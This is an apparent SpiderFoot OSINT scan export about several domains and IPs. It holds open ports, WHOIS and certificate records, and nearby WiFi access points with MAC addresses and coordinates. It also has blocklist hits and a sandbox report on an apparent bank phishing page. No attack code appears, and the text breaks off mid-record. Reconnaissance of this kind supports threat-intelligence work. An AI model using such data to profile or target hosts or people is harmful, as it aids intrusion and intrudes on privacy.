2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b30ae4babae178-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.0 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None RyanLG (Net ID: 00:01:36:4F:9A:F0) 37.780462,-122.390564 2022-12-18 00:39:59 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.8] https://www.virustotal.com/en/ip-address/188.114.96.8/information/ 188.114.96.0/24 2022-12-18 00:12:58 Malicious IP on Same Subnet Yes blocklist.de 0 0 2 0 None blocklist.de List [4.224.0.0/12] http://lists.blocklist.de/lists/all.txt 4.224.0.0/12 2022-12-18 00:06:07 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf [{u'not_after': u'2022-12-19T21:18:05', u'not_before': u'2022-09-20T21:18:06', u'issuer_ca_id': 180753, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.misogyny.wtf', u'serial_number': u'00f4f0fa2fab28c37d0eb0025f9f06b10c', u'entry_timestamp': u'2022-09-20T22:18:07.22', u'id': 7584290631}, {u'not_after': u'2022-12-19T20:09:19', u'not_before': u'2022-09-20T20:09:20', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'043bc1da8c2d8d3c49c8fb3d44b5c287b43a', u'entry_timestamp': u'2022-09-20T21:09:20.772', u'id': 7588954405}, {u'not_after': u'2022-12-19T20:09:19', u'not_before': u'2022-09-20T20:09:20', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'043bc1da8c2d8d3c49c8fb3d44b5c287b43a', u'entry_timestamp': u'2022-09-20T21:09:20.442', u'id': 7584197572}, {u'not_after': u'2022-10-21T20:47:27', u'not_before': u'2022-07-23T20:47:28', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'04d69ed288e9c1897428652d6e8809509f4f', u'entry_timestamp': u'2022-07-23T21:47:29.495', u'id': 7186449707}, {u'not_after': u'2022-10-21T20:47:27', u'not_before': u'2022-07-23T20:47:28', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'04d69ed288e9c1897428652d6e8809509f4f', u'entry_timestamp': u'2022-07-23T21:47:28.726', u'id': 7185452708}, {u'not_after': u'2022-10-21T20:45:09', u'not_before': u'2022-07-23T20:45:10', u'issuer_ca_id': 180753, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.misogyny.wtf', u'serial_number': u'392fd3a5c8f5abd1137069a51df6ba07', u'entry_timestamp': u'2022-07-23T21:45:11.265', u'id': 7185973399}] 2022-12-18 00:02:39 IP Address No SpiderFoot UI 14 0 0 0 None 137.117.157.128 plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:09:37 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.96.3 2022-12-18 00:38:37 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.3] https://www.virustotal.com/en/ip-address/188.114.96.3/information/ 188.114.96.0/24 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77af34ce8a306332-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.1 2022-12-18 00:13:44 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None private@register.it Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-05-22T07:28:29Z Creation Date: 2003-05-21T18:09:42Z Registry Expiry Date: 2023-05-21T18:09:42Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: ok https://icann.org/epp#ok Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-06-23T00:00:00Z Creation Date: 2011-01-25T00:00:00Z Registrar Registration Expiration Date: 2023-05-21T00:00:00Z Registrar: REGISTER S.P.A. Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:11:00Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None logitec-a53131 (Net ID: 00:01:8E:A5:31:30) 37.7803446,-122.3906132 2022-12-18 00:21:13 Open TCP Port No Censys 0 0 2 0 None 188.114.97.0:8880 188.114.97.0 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SpaceStation (Net ID: 00:02:2D:01:CF:F8) 37.7803446,-122.3906132 2022-12-18 00:06:40 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.1:8080 188.114.97.1 2022-12-18 00:11:55 Physical Location No ipapi.co 1 0 1 0 None Campinas, Sao Paulo, SP, Brazil, BR 20.195.209.219 2022-12-18 00:06:51 Malicious IP Address Yes Internet Storm Center 0 1 1 0 None Internet Storm Center [20.195.209.219] https://isc.sans.edu/api/ip/20.195.209.219 20.195.209.219 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:2083 188.114.96.1 2022-12-18 00:03:15 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-101.w90-116.abo.wanadoo.fr 90.116.166.101 2022-12-18 00:12:08 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.147.230', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.128.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 172.67.147.230 2022-12-18 00:23:11 Raw Data from RIRs No CRXcavator 0 0 1 0 None [{"platform": "Chrome", "version": "4.0.2", "data": {"risk": {"total": 7, "webstore": {"website": 1, "privacy_policy": 1, "users": 1, "email": 1, "address": 1, "total": 7, "support_site": 1, "rating_users": 1}, "metadata": {}}, "webstore": {"website": "", "rating": 0, "privacy_policy": "", "last_updated": "", "name": "", "price": "", "offered_by": "", "support_site": "", "version": "", "address": "", "short_description": "", "permission_warnings": null, "users": 0, "size": "", "type": "", "email": "", "rating_users": 0, "icon": ""}}, "extension_id": "efiefgpfndecmbeappadjclmkiahmejg"}] plague.fun 2022-12-18 00:12:33 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ENG', u'country_tld': u'.uk', u'ip': u'2a06:98c1:3120::1', u'currency_name': u'Pound', u'currency': u'GBP', u'country_population': 66488991, u'country_code': u'GB', u'timezone': u'Europe/London', u'city': u'London', u'network': u'2a06:98c1::/32', u'languages': u'en-GB,cy-GB,gd', u'version': u'IPv6', u'latitude': 51.5638, u'in_eu': False, u'utc_offset': u'+0000', u'continent_code': u'EU', u'country_name': u'United Kingdom', u'country_capital': u'London', u'org': u'CLOUDFLARENET', u'postal': u'N16', u'asn': u'AS13335', u'country': u'GB', u'region': u'England', u'longitude': -0.0765, u'country_calling_code': u'+44', u'country_area': 244820.0, u'country_code_iso3': u'GBR'} 2a06:98c1:3120::1 2022-12-18 00:06:02 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://portalpersonasparatodo.tdavivienda.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "142.250.188.234:443"\n "142.250.68.99:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c04_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c04_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c04_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_c04_ConnHashTable<3076>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_c04_IE_EarlyTabStart_0xb8c_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3076"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"portalpersonasparatodo.tdavivienda.repl.co"'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: portalpersonasparatodo.tdavivienda.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: portalpersonasparatodo.tdavivienda.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /css?family=IBM+Plex+Sans HTTP/1.1\nAccept: text/css, */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css?family=IBM+Plex+Sans HTTP/1.1\nAccept: text/css, */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKhdHeEw.woff HTTP/1.1\nAccept: */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://portalpersonasparatodo.tdavivienda.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKhdHeEw.woff HTTP/1.1\nAccept: */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://portalpersonasparatodo.tdavivienda.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKhdHeEw.woff HTTP/1.1\nAccept: */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://portalpersonasparatodo.tdavivienda.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nIf-Modified-Since: Tue, 26 Apr 2022 15:46:53 GMT\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKhdHeEw.woff HTTP/1.1\nAccept: */*\nReferer: https://portalpersonasparatodo.tdavivienda.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://portalpersonasparatodo.tdavivienda.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nIf-Modified-Since: Tue, 26 Apr 2022 15:46:53 GMT\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "HOMR1HKK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HOMR1HKK.txt]- [targetUID: 00000000-00003076]\n Dropped file: "70BYFHVI.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\70BYFHVI.txt]- [targetUID: 00000000-00003076]\n Dropped file: "0P8ZVUES.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0P8ZVUES.txt]- [targetUID: 00000000-00003076]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "HOMR1HKK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HOMR1HKK.txt]- [targetUID: 00000000-00003076]\n "_F47B88D9-66DA-11ED-B548-08002704E6C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_FD56E52C-66DA-11ED-B548-08002704E6C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "zYXgKVElMYYaJe8bpLHnCwDKhdHeEw_1_.woff" has type "Web Open Font Format TrueType length 22912 version 1.1"- [targetUID: N/A]\n "~DF27D127E97D4620C6.TMP" has type "data"- Location: [%TEMP%\\~DF27D127E97D4620C6.TMP]- [targetUID: 00000000-00003076]\n "70BYFHVI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\70BYFHVI.txt]- [targetUID: 00000000-00003076]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003076]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "css_1_.css" has type "ASCII text"- [targetUID: N/A]\n "~DF124D53EE7F9A90CB.TMP" has type "data"- Location: [%TEMP%\\~DF124D53EE7F9A90CB.TMP]- [targetUID: 00000000-00003076]\n "0P8ZVUES.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0P8ZVUES.txt]- [targetUID: 00000000-00003076]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC68A1D769C014E40.TMP" has type "data"- Location: [%TEMP%\\~DFC68A1D769C014E40.TMP]- [targetUID: 00000000-00003076]\n "RecoveryStore._F47B88D7-66DA-11ED-B548-08002704E6C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFE4673773FB07FA74.TMP" has type "data"- Location: [%TEMP%\\~DFE4673773FB07FA74.TMP]- [targetUID: 00000000-00003076]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: portalpersonasparatodo.tdavivienda.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 404 Not Found\nExpect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\nReplit-Cluster: global\nStrict-Transport-Security: max-age=7558278; includeSubDomains\nDate: Fri, 18 Nov 2022 01:50:19 GMT\nContent-Type: text/html; charset=utf-8\nTransfer-Encoding: chunked\n\n800\n\n\n \n 34.149.204.188 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None fse2 (Net ID: 00:01:38:A0:A1:09) 37.7803446,-122.3906132 2022-12-18 00:09:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.0:8080 188.114.96.0/24 2022-12-18 00:26:50 Physical Location No MetaDefender 0 0 2 0 None Firenze, Italy 81.88.52.232 2022-12-18 00:03:10 Co-Hosted Site No SSL Certificate Analyzer 0 0 1 0 None webapps.net zerotwo-best-waifu.online 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2087 188.114.97.1 2022-12-18 00:32:23 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.world plague.fun 2022-12-18 00:22:07 Raw Data from RIRs No Censys 4 0 2 0 None {"last_updated_at": "2022-12-17T20:42:12.354Z", "ip": "34.149.204.188", "location_updated_at": "2022-12-14T04:27:41.707226Z", "autonomous_system_updated_at": "2022-12-14T04:27:41.801832Z", "location": {"province": "Missouri", "city": "Kansas City", "country": "United States", "coordinates": {"latitude": 39.1027, "longitude": -94.5778}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "64184", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"amateratsoo.repl.co": {"record_type": "A", "resolved_at": "2022-12-09T12:38:10.004089491Z"}, "hotibulumam.repl.co": {"record_type": "A", "resolved_at": "2022-12-12T12:35:37.237809082Z"}, "mrs-ee1.repl.co": {"record_type": "A", "resolved_at": "2022-12-05T12:36:55.341392461Z"}, "ashenawy.repl.co": {"record_type": "A", "resolved_at": "2022-11-20T12:40:21.730207038Z"}, "mashagaming.repl.co": {"record_type": "A", "resolved_at": "2022-12-13T12:38:30.338591955Z"}, "firefaul.repl.co": {"record_type": "A", "resolved_at": "2022-11-21T12:34:23.051723683Z"}, "decong.repl.co": {"record_type": "A", "resolved_at": "2022-11-27T12:30:01.238196034Z"}, "lelbr.repl.co": {"record_type": "A", "resolved_at": "2022-12-06T12:47:53.318101247Z"}, "vizier1.repl.co": {"record_type": "A", "resolved_at": "2022-11-19T12:34:45.641702945Z"}, "dafahaulia.repl.co": {"record_type": "A", "resolved_at": "2022-12-10T12:37:48.473860402Z"}, "1-c-d-l-1c.repl.co": {"record_type": "A", "resolved_at": "2022-11-22T12:40:13.151572843Z"}, "tilamour.mvp.ng": {"record_type": "CNAME", "resolved_at": "2022-12-11T16:31:05.536832979Z"}, "yolandasintia04.repl.co": {"record_type": "A", "resolved_at": "2022-12-10T12:38:03.862208343Z"}, "kmc1196.repl.co": {"record_type": "A", "resolved_at": "2022-12-16T12:35:52.357779120Z"}, "hubuzhou.repl.co": {"record_type": "A", "resolved_at": "2022-12-17T12:37:21.135697453Z"}, "nhan20001.repl.co": {"record_type": "A", "resolved_at": "2022-11-19T12:34:44.496026516Z"}, "sddfdsfdsfs.repl.co": {"record_type": "A", "resolved_at": "2022-11-28T12:31:01.846253974Z"}, "ianjak.repl.co": {"record_type": "A", "resolved_at": "2022-11-21T12:34:32.471465386Z"}, "confirmation005.repl.co": {"record_type": "A", "resolved_at": "2022-12-15T12:35:35.731072580Z"}, "ejaagbt.repl.co": {"record_type": "A", "resolved_at": "2022-12-04T12:38:31.630130484Z"}, "hubertluszkiewi.repl.co": {"record_type": "A", "resolved_at": "2022-12-08T12:34:58.920477681Z"}, "aarushk.repl.co": {"record_type": "A", "resolved_at": "2022-12-03T12:40:06.418152290Z"}, "galicia96.repl.co": {"record_type": "A", "resolved_at": "2022-11-30T12:39:10.943982135Z"}, "kylesukaanxiety.repl.co": {"record_type": "A", "resolved_at": "2022-11-20T12:40:33.544091439Z"}, "1a7ce7bd-aeb6-4d77-bfae-54421da18c41.id.repl.co": {"record_type": "A", "resolved_at": "2022-12-12T12:35:58.742805031Z"}, "batam.repl.co": {"record_type": "A", "resolved_at": "2022-12-09T12:37:48.034213427Z"}, "lutfi-ainiaini.repl.co": {"record_type": "A", "resolved_at": "2022-12-11T12:41:16.752277025Z"}, "hendrapramana.repl.co": {"record_type": "A", "resolved_at": "2022-12-13T12:38:53.367761692Z"}, "rizki-nurnur1.repl.co": {"record_type": "A", "resolved_at": "2022-11-30T12:39:30.876827380Z"}, "hotingrvop.tk": {"record_type": "A", "resolved_at": "2022-12-13T17:53:24.249517841Z"}, "eden1122.repl.co": {"record_type": "A", "resolved_at": "2022-12-08T12:34:49.524099941Z"}, "www.trivagosocial.com": {"record_type": "CNAME", "resolved_at": "2022-11-05T22:48:48.033728955Z"}, "alessandrocava.repl.co": {"record_type": "A", "resolved_at": "2022-12-17T12:36:39.589510458Z"}, "melekniyonzima.repl.co": {"record_type": "A", "resolved_at": "2022-12-07T12:41:23.471438067Z"}, "gircgalici32.repl.co": {"record_type": "A", "resolved_at": "2022-11-29T12:38:29.470842429Z"}, "li1026490.repl.co": {"record_type": "A", "resolved_at": "2022-12-10T12:37:36.466227598Z"}, "allifiyaisti.repl.co": {"record_type": "A", "resolved_at": "2022-11-29T12:38:26.853200376Z"}, "josephbernardo.repl.co": {"record_type": "A", "resolved_at": "2022-12-17T12:37:02.270054201Z"}, "adleyjair.repl.co": {"record_type": "A", "resolved_at": "2022-11-29T12:38:23.678022463Z"}, "jjyxxpy.repl.co": {"record_type": "A", "resolved_at": "2022-12-16T12:35:18.258929737Z"}, "thomaspayton.repl.co": {"record_type": "A", "resolved_at": "2022-11-23T13:59:35.002891215Z"}, 